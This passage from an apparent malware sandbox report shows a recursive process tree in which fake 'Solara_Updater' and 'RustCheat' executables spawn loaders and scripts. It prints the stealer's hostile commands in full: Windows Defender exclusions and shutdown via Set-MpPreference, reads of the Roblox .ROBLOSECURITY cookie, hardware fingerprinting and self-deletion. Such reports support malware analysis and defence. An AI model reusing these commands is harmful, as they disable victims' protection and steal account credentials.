C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"23⤵
- Executes dropped EXE
PID:2880 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"24⤵PID:2256
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "25⤵
- Loads dropped DLL
PID:1800 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"26⤵PID:2776
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"23⤵PID:2280
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"24⤵
- Executes dropped EXE
PID:2748 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"25⤵PID:1800
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"25⤵PID:2700
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"24⤵
- Executes dropped EXE
PID:1508 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"25⤵PID:1680
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "26⤵
- Loads dropped DLL
PID:1740 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"27⤵PID:2888
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"24⤵PID:2440
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"25⤵PID:1720
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"25⤵PID:2908
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"26⤵PID:2328
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "27⤵
- Loads dropped DLL
PID:1856 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"28⤵PID:1664
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"25⤵PID:1492
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"26⤵PID:1780
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"26⤵PID:1868
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"27⤵PID:760
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "28⤵
- Loads dropped DLL
PID:2232 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"29⤵PID:1240
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"26⤵PID:2872
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"27⤵PID:2756
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"27⤵PID:2596
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"28⤵PID:1696
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "29⤵
- Loads dropped DLL
PID:2580 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"30⤵PID:2932
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"27⤵PID:2148
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"28⤵PID:2516
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"28⤵PID:1800
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"29⤵PID:2120
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "30⤵
- Loads dropped DLL
PID:2968 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"31⤵PID:2240
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"28⤵PID:2196
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"29⤵PID:2456
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"30⤵PID:2540
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"30⤵
- Drops file in Drivers directory
PID:2872 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid31⤵PID:1604
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"31⤵
- Views/modifies file attributes
PID:1740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'31⤵
- Command and Scripting Interpreter: PowerShell
PID:2656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 231⤵PID:2404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY31⤵PID:1500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY31⤵PID:1808
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption31⤵PID:3040
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory31⤵PID:2124
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid31⤵PID:1248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER31⤵PID:2348
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name31⤵
- Detects videocard installed
PID:2012
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause31⤵PID:2488
-
C:\Windows\system32\PING.EXEping localhost32⤵
- Runs ping.exe
PID:2916
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"29⤵PID:2316
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"30⤵PID:1932
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "31⤵
- Loads dropped DLL
PID:1872 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"32⤵PID:2928
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"29⤵PID:2568
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"30⤵
- Blocklisted process makes network request
PID:1992 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"31⤵PID:316
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"31⤵PID:2956
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"30⤵PID:2848
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"31⤵PID:2448
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "32⤵
- Loads dropped DLL
PID:1296 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"33⤵PID:2696
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"30⤵PID:2772
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"31⤵PID:2252
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"32⤵PID:1328
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"32⤵
- Drops file in Drivers directory
PID:2236 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid33⤵PID:1992
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"33⤵
- Views/modifies file attributes
PID:644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'33⤵
- Command and Scripting Interpreter: PowerShell
PID:2532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 233⤵PID:2376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY33⤵PID:1556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY33⤵PID:924
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption33⤵PID:1868
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory33⤵PID:3060
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid33⤵PID:2680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER33⤵PID:1864
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name33⤵
- Detects videocard installed
PID:2408
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause33⤵PID:1484
-
C:\Windows\system32\PING.EXEping localhost34⤵
- Runs ping.exe
PID:668
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"31⤵PID:3048
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"32⤵PID:2220
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "33⤵
- Loads dropped DLL
PID:2716 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"34⤵PID:2136
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"31⤵PID:2532
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"32⤵PID:2768
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"33⤵PID:2224
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"33⤵PID:1028
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"32⤵PID:2856
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"33⤵PID:1076
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "34⤵
- Loads dropped DLL
PID:1028 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"35⤵PID:2480
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"32⤵PID:1596
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"33⤵PID:1700
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"33⤵PID:3024
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"34⤵PID:2444
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "35⤵
- Loads dropped DLL
PID:316 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"36⤵PID:1476
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"33⤵PID:2944
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"34⤵PID:3040
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"34⤵PID:2416
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"35⤵PID:2596
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "36⤵
- Loads dropped DLL
PID:540 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"37⤵PID:264
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"34⤵PID:808
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"35⤵PID:2832
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"35⤵PID:2392
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"36⤵PID:2456
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "37⤵
- Loads dropped DLL
PID:2020 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"38⤵PID:1528
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"35⤵PID:2772
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"36⤵PID:2496
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"36⤵PID:1516
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"37⤵PID:3008
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "38⤵
- Loads dropped DLL
PID:1720 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"39⤵PID:292
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"36⤵PID:296
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"37⤵PID:2500
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"37⤵PID:3016
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"38⤵PID:1776
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "39⤵
- Loads dropped DLL
PID:2760 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"40⤵PID:2024
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"37⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"38⤵PID:280
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"38⤵PID:644
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"39⤵PID:2736
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "40⤵
- Loads dropped DLL
PID:1560 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"41⤵PID:1508
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"38⤵PID:2880
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"39⤵PID:2224
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"39⤵PID:1004
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"40⤵PID:2832
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "41⤵
- Loads dropped DLL
PID:1852 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"42⤵PID:2280
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"39⤵PID:2604
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"40⤵PID:1816
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"40⤵PID:1788
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"41⤵PID:3016
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "42⤵
- Loads dropped DLL
PID:1648 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"43⤵PID:1776
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"40⤵PID:2192
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"41⤵PID:2584
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"42⤵PID:2324
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"42⤵
- Drops file in Drivers directory
PID:2268 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid43⤵PID:2104
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"43⤵
- Views/modifies file attributes
PID:1792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'43⤵
- Command and Scripting Interpreter: PowerShell
PID:2884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 243⤵PID:2112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY43⤵PID:2252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY43⤵PID:1364
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption43⤵PID:2152
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory43⤵PID:2224
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid43⤵PID:1864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER43⤵PID:3060
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name43⤵
- Detects videocard installed
PID:1648
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause43⤵PID:1620
-
C:\Windows\system32\PING.EXEping localhost44⤵
- Runs ping.exe
PID:2408
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"41⤵PID:2484
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"42⤵PID:3052
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "43⤵
- Loads dropped DLL
PID:2416 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"44⤵PID:496
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"41⤵PID:2156
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"42⤵PID:776
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"42⤵PID:864
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"43⤵PID:2332
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "44⤵
- Loads dropped DLL
PID:2092 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"45⤵PID:2316
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"42⤵PID:2148
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"43⤵PID:2712
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"43⤵PID:2868
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"44⤵PID:2948
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "45⤵
- Loads dropped DLL
PID:1728 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"46⤵PID:1140
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"43⤵PID:1520
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"44⤵PID:2500
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"44⤵PID:1816
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"45⤵PID:1992
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "46⤵
- Loads dropped DLL
PID:468 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"47⤵PID:2904
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"44⤵PID:1768
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"45⤵PID:2544
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"45⤵PID:2528
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"46⤵PID:2436
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "47⤵
- Loads dropped DLL
PID:1932 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"48⤵PID:1560
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"45⤵PID:1556
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"46⤵PID:2232
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"46⤵PID:1932
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"47⤵PID:1792
-
